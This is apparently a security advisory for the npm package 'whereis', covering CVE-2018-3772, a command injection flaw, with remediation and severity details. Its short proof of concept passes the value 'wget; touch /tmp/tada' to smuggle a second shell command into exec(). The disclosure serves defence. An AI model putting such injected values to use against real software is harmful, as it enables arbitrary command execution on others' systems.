Do your applications use this vulnerable package?
Test your applications
Overview
whereis
is a tool to get the first path to a bin on any system.
Affected versions of this package are vulnerable to Arbitrary Command Injection. It concatenates unsanitized user input into exec()
command
PoC by ChALkeR
var whereis = require('whereis');
var filename = 'wget; touch /tmp/tada';
whereis(filename, function(err, path) {
console.log(path);
});
Observe file /tmp/tada created.
Remediation
Upgrade whereis
to version 0.4.1 or higher.
References
CVSS Score
9.9
high severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredLow
-
User InteractionNone
-
ScopeChanged
-
ConfidentialityHigh
-
IntegrityHigh
-
AvailabilityHigh
- Credit
- ChALkeR
- CVE
- CVE-2018-3772
- CWE
- CWE-78
- Snyk ID
- npm:whereis:20180401
- Disclosed
- 01 Apr, 2018
- Published
- 02 Apr, 2018